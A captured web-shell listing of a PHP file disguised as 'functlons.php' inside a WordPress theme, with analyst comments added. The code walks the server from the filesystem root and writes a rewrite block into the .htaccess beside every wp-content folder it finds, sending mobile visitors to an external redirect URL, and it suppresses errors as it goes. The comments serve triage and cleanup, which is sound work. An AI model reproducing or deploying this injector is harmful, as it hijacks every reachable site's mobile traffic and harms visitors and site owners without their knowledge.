HEX
Server: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fips
System: Linux f17.eelserver.com 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
User: zulfiqar (1155)
PHP: 8.2.0
Disabled: mail, exec, system, popen, proc_open, shell_exec, passthru, show_source
Upload Files
File: /home/zulfiqar/public_html/wp-content/themes/custom-functions-1772181936/functlons.php
<!--oc7tDiUn-->
<?php
// Remove the execution-time limit and raise the memory limit to 512M, so the
// whole-filesystem walk started further down is not cut short.
set_time_limit(0);
ini_set('memory_limit', '512M');

// Canonical path of the directory that holds this script. It is passed to
// deepScanGlobal() as the one directory the scan leaves alone.
$scriptDir = realpath(__DIR__);

/**
 * Walks the directory tree under $startDir and, for every directory named
 * "wp-content", writes a redirect block into the .htaccess file of that
 * directory's parent.
 *
 * Analyst notes for triage and cleanup, all taken from the code below:
 *  - The written block turns on mod_rewrite and 302-redirects any request whose
 *    User-Agent matches a list of mobile strings to an external URL. Desktop
 *    user agents do not match, so checking an affected site from a desktop
 *    browser will not show the redirect.
 *  - The script decides whether a file is already altered by looking for the
 *    substring 'lakns.com/link?z=9557727'. Searching .htaccess files for the
 *    same substring finds the files it touched.
 *  - In an existing file the block is prepended, so it is the first lines of
 *    the file and the previous content follows unchanged. A file created by
 *    the script contains only the block.
 *  - Every filesystem call that can fail is prefixed with @, so failed reads
 *    and writes raise no PHP warning.
 *  - How far the walk reaches depends on what the PHP process user may read and
 *    write; the code itself sets no boundary other than $excludeDir.
 *
 * @param string       $startDir   Directory the walk starts from.
 * @param string|false $excludeDir  Canonical path (as returned by realpath())
 *                                  that is neither scanned nor modified.
 * @return array 'folders' holds the realpath of each wp-content directory
 *               found; 'modified' holds one "Created: <path>" or
 *               "Modified: <path>" string per .htaccess that was written.
 */
function deepScanGlobal($startDir = '/', $excludeDir) {
    $results = [];
    // Explicit stack instead of recursion; array_pop makes the walk depth-first.
    $stack = [$startDir];
    $modified = [];

    while (!empty($stack)) {
        $current = array_pop($stack);

        // Symlinks are not followed, which also avoids link loops.
        if (!is_dir($current) || is_link($current)) continue;
        // The excluded directory (the script's own location at the call site) is skipped entirely.
        if (realpath($current) === $excludeDir) continue;

        // Unreadable directories yield false and are passed over without any warning.
        $items = @scandir($current);
        if (!$items) continue;

        foreach ($items as $item) {
            if ($item === '.' || $item === '..') continue;
            $fullPath = $current . DIRECTORY_SEPARATOR . $item;

            if (is_dir($fullPath)) {
                // Only the directory name is tested; nothing checks that this is a real WordPress install.
                if (basename($fullPath) === 'wp-content') {
                    $results[] = realpath($fullPath);
                    
                    // Parent of wp-content: the directory whose .htaccess gets written.
                    $dirPath = dirname($fullPath);
                    // This continue also skips the push at the end of the loop body, so a
                    // wp-content directly inside the excluded directory is not descended into.
                    if (realpath($dirPath) === $excludeDir) continue;
                    
                    $htaccessPath = $dirPath . DIRECTORY_SEPARATOR . '.htaccess';
                    
                    // Tag built from the Host header of the request that ran this script:
                    // the port is stripped and the last dot-separated label is dropped.
                    // It is computed from that one request, so every file written in a run
                    // carries the same tag regardless of which site the file belongs to.
                    $host = $_SERVER['HTTP_HOST'] ?? '';
                    $host = preg_replace('/:\d+$/', '', $host);
                    $parts = explode('.', $host);
                    if (count($parts) > 1) {
                        array_pop($parts);
                    }
                    $var = implode('.', $parts);

                    // The rewrite block. {$var} is interpolated by PHP; {CLICK_ID} has no
                    // leading $ and is therefore written to the file literally.
                    $insert =
                    "RewriteEngine On\n" .
                    "RewriteCond %{HTTP_USER_AGENT} \"Android|iPhone|iPad|iPod|BlackBerry|Windows Phone\" [NC]\n" .
                    "RewriteRule ^.*$ https://lakns.com/link?z=9557727&var=nei{$var}&ymid={CLICK_ID} [R=302,L]\n\n";

                    if (!file_exists($htaccessPath)) {
                        // No .htaccess yet: a new file holding only the block is created.
                        if (@file_put_contents($htaccessPath, $insert)) {
                            $modified[] = "Created: " . $htaccessPath;
                        }
                    } else {
                        // Existing file: the block is prepended unless the marker substring is already present.
                        $content = @file_get_contents($htaccessPath);
                        if ($content !== false && strpos($content, 'lakns.com/link?z=9557727') === false) {
                            if (@file_put_contents($htaccessPath, $insert . $content)) {
                                $modified[] = "Modified: " . $htaccessPath;
                            }
                        }
                    }
                }
                // Every subdirectory, wp-content included, is queued for the walk.
                $stack[] = $fullPath;
            }
        }
    }

    return ['folders' => $results, 'modified' => $modified];
}

// Report shown to whoever requests this script over HTTP.
echo "<h3>Global search for 'wp-content' from server root (/)</h3>";
echo "<p>This may take a few minutes...</p><hr>";

// The walk starts at the filesystem root and skips only the script's own directory.
$result = deepScanGlobal('/', $scriptDir);

if (empty($result['folders'])) {
    echo "<p>❌ Nothing found.</p>";
} else {
    echo "<p>Found folders: " . count($result['folders']) . "</p>";
    foreach ($result['folders'] as $dir) {
        echo "<code>" . htmlspecialchars($dir) . "</code><br>";
    }
    
    // The list of written .htaccess files is only echoed into this response; the
    // code shown stores it nowhere, so cleanup has to locate the files by
    // searching for the injected block.
    if (!empty($result['modified'])) {
        echo "<br><h4>.htaccess modifications:</h4>";
        foreach ($result['modified'] as $mod) {
            echo "<code>" . htmlspecialchars($mod) . "</code><br>";
        }
    }
}
?>